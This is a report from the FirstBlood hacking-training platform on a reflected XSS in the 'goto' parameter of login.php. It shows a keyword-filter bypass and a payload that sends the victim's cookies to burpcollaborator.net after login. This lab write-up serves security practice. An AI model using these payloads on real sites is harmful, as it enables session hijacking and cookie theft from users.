FirstBlood-#478 — Reflective xss vis 'goto=' parmater on login.php
This issue was discovered on FirstBlood v2
On 2021-10-25, newrouge Level 3 reported:
Hey, I found that hidden paramter goto= is still vulnerable to xss. It reflects the user input in response. Although keywords like alert, onfocus and brackets were blocked but it can still be bypassed.
Steps:
- Visit URL https://ac13a34d19a2-newrouge.a.firstbloodhackers.com/login.php?goto=javascript:confirm`1`.
No alert, brackets keywords was used so it bypasses the filter.
- Enter your login credentials, Now you will see a popup.
Now Let's steal some cookies with this ;)
-
Visit this malicious url : https://ac13a34d19a2-newrouge.a.firstbloodhackers.com/login.php?goto=javascript:location.href=`http://burpcollaborator.net?${document.cookie}`
-
It will redirect the user after login to attacker domain and cookies will be logged to attacker's server.*
-
Login with your credentials.
- Now you will be redirected to burp url, and your cookies are leaked.
Thank you
newrouge
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: javascript:location.href=`http://burpcollaborator.net?${document.cookie}`
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug
ID 26
because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.